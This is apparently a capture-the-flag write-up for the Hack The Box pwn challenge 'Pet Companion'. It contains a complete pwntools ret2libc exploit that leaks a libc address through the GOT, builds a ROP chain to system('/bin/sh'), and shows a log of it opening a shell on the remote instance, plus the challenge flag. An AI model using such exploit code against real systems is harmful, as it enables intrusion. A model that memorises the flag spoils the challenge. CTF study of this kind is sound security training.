# Pet Companion

{% file src="<https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FKAJj9GrvmPvJLpWTYKdo%2Fpwn_pet_companion.zip?alt=media&token=1010aeba-232c-43c6-b39f-795c102c915f>" %}

### <mark style="color:blue;">Challenge Description :</mark>&#x20;

```
Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.
```

### <mark style="color:red;">Exploit.py :</mark>&#x20;

```python
from pwn import *


def start(argv=[], *a, **kw) :
	if args.GDB:  # Set GDBscript below
		return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
	elif args.REMOTE:  # ('server', 'port')
		return remote(sys.argv[1], sys.argv[2], *a, **kw)
	else:  # Run locally
		return process([exe] + argv, *a, **kw)


# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
libc = ELF('libc.so.6')  # Local

offset = 72

# Start program
io = start()

# POP RDI from ropper
ret = 0x4004de
pop_rdi = 0x400743
pop_rsi = 0x400741

# Payload to leak libc function
# write takes 3 arguments the second arg is what it will print to the screen
payload = flat({
	offset: [
		pop_rsi,
		elf.got.write,
		elf.got.write,
		elf.plt.write,
		elf.symbols.main
	]
})

# Send the payload
io.sendlineafter(b'status: ', payload)

# Retrieve got.write address
io.recvline()
io.recvline()
io.recvline()

got_write = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)

# # # Subtract puts offset to get libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)

# System(/bin/sh)
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Payload to get shell
payload = flat({
	offset: [
		pop_rdi,
		bin_sh,
		libc.symbols.system
	]
})

# Send the payload
io.sendline(payload)

# Got Shell?
io.interactive()
```

```bash
┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode

[*] Configuring...

$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$  
```

### <mark style="color:red;">Flag.txt :</mark>&#x20;

```bash
HTB{c0nf1gur3_w3r_d0g}
```